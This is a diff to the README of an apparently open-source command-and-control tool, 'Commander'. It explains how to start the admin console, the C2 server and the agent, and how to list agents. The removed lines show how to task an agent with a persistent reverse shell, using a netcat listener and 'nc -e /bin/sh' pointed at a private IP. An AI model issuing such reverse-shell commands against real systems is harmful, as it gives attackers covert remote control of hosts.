voukatas/Commander/README.md

 ![screenshot](screenshots/c2_reregister_flow2.jpg)

 ## Useful examples
 To setup your environment start the admin.py first and then the c2_server.py and run the agent.
-After you can check the availiable agents and also task them to run a "die hard" reverse shell.
-Do that like this:
+After you can check the availiable agents.

 ```
 # show all availiable agents
 show agent all

-# first open a netcat on your machine
-nc -vnlp 4444

-# add a task to open a reverse shell for a specific agent
-task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

 ```
-This way you will have a shell that even if you get disconnected it will get back up immediately.
-Only the interactive commands will make it die permanently.

 To instruct all the agents to run the command "id" you can do it like this: